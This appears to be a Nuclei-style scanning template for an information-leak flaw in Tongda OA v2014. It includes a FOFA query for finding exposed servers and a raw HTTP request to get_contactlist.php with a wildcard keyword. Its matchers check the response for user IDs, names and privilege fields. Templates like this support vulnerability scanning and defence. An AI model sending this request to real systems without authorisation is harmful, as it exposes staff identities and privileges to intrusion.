id: TongDa-1

info:
  name: 通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞
  author: attempt
  severity: low
  description: |
    通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞，攻击者通过漏洞可以获取敏感信息，进一步攻击。
  reference:
    - https://peiqi.wgpsec.org/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v2014%20get_contactlist.php%20%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.html
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="TDXK-通达OA" && body="/templates/2013_01/index.css"
  tags: TongDa,OA,敏感信息泄漏漏洞
request:
  - raw:
      - |
        GET /mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3 HTTP/1.1
        Host: {{RootURL}}
        Accept-Language: zh-CN
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate, br
        Connection: keep-alive
    
    matchers:
      - type: word
        part: body
        words:
          - "user_uid"
          - "user_name"
          - "user_id"
          - "priv_name"
        condition: or